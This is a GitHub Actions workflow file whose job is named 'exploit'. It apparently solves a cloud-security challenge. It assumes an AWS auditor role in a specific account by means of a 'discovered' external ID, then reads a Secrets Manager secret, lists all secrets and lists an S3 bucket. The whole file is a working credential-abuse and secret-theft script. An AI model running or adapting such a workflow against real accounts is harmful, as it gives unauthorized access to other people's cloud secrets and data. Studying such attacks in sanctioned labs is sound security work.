name: SIMPLE SOLUTION - Use ExtID with Original Role

on:
  workflow_dispatch:
  push:

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
    - name: Try Original Audit Role with Discovered External ID
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: arn:aws:iam::170974506515:role/prod-readonly-auditor
        aws-region: us-west-1
        role-session-name: OriginalRoleWithExtID
        role-external-id: "internal/secrets/id-v2"
        
    - name: Check AWS Access
      run: |
        echo "🎉 Checking AWS access with audit role..."
        aws sts get-caller-identity
        
    - name: Try Secret Access
      run: |
        echo "🎯 Trying to access the secret..."
        aws secretsmanager get-secret-value --secret-id "internal/secrets/id-v2" --region us-west-1
        
    - name: List Available Secrets
      run: |
        echo "📋 Listing available secrets..."
        aws secretsmanager list-secrets --region us-west-1
        
    - name: Check S3 Bucket
      run: |
        echo "📦 Checking S3 bucket from gist..."
        aws s3 ls s3://ci-deployment-logsv1/ --region us-west-1